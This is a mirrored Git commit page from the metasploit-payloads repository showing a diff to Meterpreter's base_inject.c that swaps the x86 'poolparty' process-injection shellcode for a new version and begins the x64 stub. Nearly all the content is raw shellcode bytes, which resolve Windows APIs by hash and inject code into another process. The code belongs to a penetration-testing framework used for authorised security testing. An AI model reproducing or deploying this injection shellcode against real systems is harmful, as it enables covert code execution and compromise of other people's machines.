github/metasploit-payloads
1
Fork 0
mirror of https://github.com/rapid7/metasploit-payloads synced 2025-01-14 17:37:27 +01:00
Code Releases Activity

feat(injection): updating x86 shellcode

Browse Source
This commit is contained in:
dledda-r7 2024-08-09 07:06:21 -04:00
parent f1492da090
commit dc30ecc054
No known key found for this signature in database
GPG Key ID: 4D4EC504A1F02FFF
1 changed files with 13 additions and 11 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

24
c/meterpreter/source/metsrv/base_inject.c
View File

@ -78,17 +78,19 @@ BYTE apc_stub_x64[] = "\xFC\x80\x79\x10\x00\x0F\x85\x13\x01\x00\x00\xC6\x41\x10
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00";
BYTE poolparty_stub_x86[] = "\xFC\x8B\x74\x24\x08\x55\x89\xE5\xE8\x8C\x00\x00\x00\x60\x89\xE5"
"\x31\xD2\x64\x8B\x52\x30\x8B\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F"
"\xB7\x4A\x26\x31\xFF\x31\xC0\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF"
"\x0D\x01\xC7\x49\x75\xEF\x52\x57\x8B\x52\x10\x8B\x42\x3C\x01\xD0"
"\x8B\x40\x78\x85\xC0\x74\x4C\x01\xD0\x50\x8B\x48\x18\x8B\x58\x20"
"\x01\xD3\x85\xC9\x74\x3C\x49\x8B\x34\x8B\x01\xD6\x31\xFF\x31\xC0"
"\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4\x03\x7D\xF8\x3B\x7D\x24"
"\x75\xE0\x58\x8B\x58\x24\x01\xD3\x66\x8B\x0C\x4B\x8B\x58\x1C\x01"
"\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24\x5B\x5B\x61\x59\x5A\x51"
"\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x83\x5B\x31\xC9\x51\x51\xFF\x76"
"\x08\xFF\x36\x51\x51\x68\x38\x68\x0D\x16\xFF\xD3\xC9\xC2\x0C\x00";
BYTE poolparty_stub_x86[] = "\xFC\xE9\xBE\x00\x00\x00\x5E\x55\x89\xE5\xE8\x8C\x00\x00\x00\x60"
"\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B\x52\x0C\x8B\x52\x14\x8B\x72"
"\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0\xAC\x3C\x61\x7C\x02\x2C\x20"
"\xC1\xCF\x0D\x01\xC7\x49\x75\xEF\x52\x57\x8B\x52\x10\x8B\x42\x3C"
"\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4C\x01\xD0\x50\x8B\x48\x18\x8B"
"\x58\x20\x01\xD3\x85\xC9\x74\x3C\x49\x8B\x34\x8B\x01\xD6\x31\xFF"
"\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4\x03\x7D\xF8\x3B"
"\x7D\x24\x75\xE0\x58\x8B\x58\x24\x01\xD3\x66\x8B\x0C\x4B\x8B\x58"
"\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24\x5B\x5B\x61\x59"
"\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x83\x5B\xFF\x76\x10\x6A"
"\xFF\x68\x08\x87\x1D\x60\xFF\xD3\x31\xC9\x51\x51\xFF\x76\x08\xFF"
"\x36\x51\x51\x68\x38\x68\x0D\x16\xFF\xD3\x31\xC0\x39\xC0\x74\xFA"
"\xC9\xC2\x0C\x00\xE8\x3D\xFF\xFF\xFF";
BYTE poolparty_stub_x64[] = "\xFC\xE9\x09\x01\x00\x00\x5E\x48\x83\xEC\x78\xE8\xC8\x00\x00\x00"
"\x41\x51\x41\x50\x52\x51\x56\x48\x31\xD2\x65\x48\x8B\x52\x60\x48"